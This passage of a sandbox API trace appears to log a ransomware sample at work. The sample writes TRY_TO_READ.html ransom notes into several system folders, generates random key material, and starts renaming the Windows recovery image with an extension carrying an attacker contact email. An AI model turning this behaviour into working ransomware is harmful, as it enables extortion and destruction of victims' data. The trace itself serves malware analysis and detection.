	[0052.117] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.117] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.120] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.120] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.121] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.121] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.121] CloseHandle (hObject=0x444) returned 1
	[0052.121] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.121] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.121] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.121] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589558 | out: hHeap=0x540000) returned 1
	[0052.121] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1
	[0052.121] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.121] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.121] GetLastError () returned 0x0
	[0052.121] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.122] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.122] GetLastError () returned 0x0
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.122] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.122] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589558
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a55d0
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0052.122] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.122] GetLastError () returned 0x0
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.122] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0052.122] GetLastError () returned 0x0
	[0052.122] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.122] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.125] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.125] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.126] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.126] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.126] CloseHandle (hObject=0x444) returned 1
	[0052.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0052.126] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1
	[0052.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.126] GetLastError () returned 0x0
	[0052.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.126] GetLastError () returned 0x0
	[0052.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.126] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5895e0
	[0052.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5580
	[0052.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0052.126] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.127] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.127] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.127] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5896f0
	[0052.127] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.127] GetLastError () returned 0x0
	[0052.127] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.127] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0052.127] GetLastError () returned 0x0
	[0052.127] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.127] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.129] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.129] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.130] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.130] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.130] CloseHandle (hObject=0x444) returned 1
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0052.131] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.131] GetLastError () returned 0x0
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588d60
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.131] GetLastError () returned 0x0
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5a1038
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5832a8
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5530
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5896f0
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596760
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596770
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589778
	[0052.131] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.131] GetLastError () returned 0x0
	[0052.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc0) returned 0x5919d0
	[0052.132] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0052.132] GetLastError () returned 0x0
	[0052.132] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb0) returned 0x598d40
	[0052.132] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444
	[0052.134] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0052.134] WriteFile (in: hFile=0x444, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0052.135] WriteFile (in: hFile=0x444, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0052.135] WriteFile (in: hFile=0x444, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0052.135] CloseHandle (hObject=0x444) returned 1
	[0052.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0052.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0052.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0052.135] FindNextFileW (in: hFindFile=0x575760, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0
	[0052.135] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x5839c0
	[0052.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0052.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596f08 | out: hHeap=0x540000) returned 1
	[0052.135] FindFirstFileW (in: lpFileName="C:\\\\PerfLogs\\Admin\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5757a0
	[0052.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.135] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.135] GetLastError () returned 0x12
	[0052.135] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0052.135] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.136] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a54e0
	[0052.136] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5757e0
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5757e0 | out: hHeap=0x540000) returned 1
	[0052.136] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a54e0 | out: hHeap=0x540000) returned 1
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0052.136] FindNextFileW (in: hFindFile=0x5757a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.136] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.136] GetLastError () returned 0x12
	[0052.136] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583988
	[0052.136] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.136] FindNextFileW (in: hFindFile=0x5757a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d48b70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.136] FindNextFileW (in: hFindFile=0x5757a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d48b70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.136] FindFirstFileW (in: lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5757e0
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.136] FindNextFileW (in: hFindFile=0x5757e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.136] FindNextFileW (in: hFindFile=0x5757e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1
	[0052.137] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.137] FindNextFileW (in: hFindFile=0x5757e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9d48b70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d48b70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d48b70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.137] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0052.137] FindNextFileW (in: hFindFile=0x5757e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 1
	[0052.137] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.137] FindNextFileW (in: hFindFile=0x5757e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x6496a3c6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x64b0e1b9, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfa6eb761, ftLastWriteTime.dwHighDateTime=0x1cb88d1, nFileSizeHigh=0x0, nFileSizeLow=0xa160012, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Winre.wim", cAlternateFileName="")) returned 0
	[0052.137] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b7e30 | out: pbBuffer=0x5b7e30) returned 1
	[0052.137] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596760 | out: pbBuffer=0x596760) returned 1
	[0052.137] SetFileAttributesW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", dwFileAttributes=0x80) returned 1
	[0052.139] lstrlenW (lpString="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned 59
	[0052.139] GetProcessHeap () returned 0x540000
	[0052.139] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xdc) returned 0x5919d0
	[0052.139] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim"
	[0052.139] lstrcatW (in: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim.12781717671972518758.ex_parvis@aol.com.AIR"
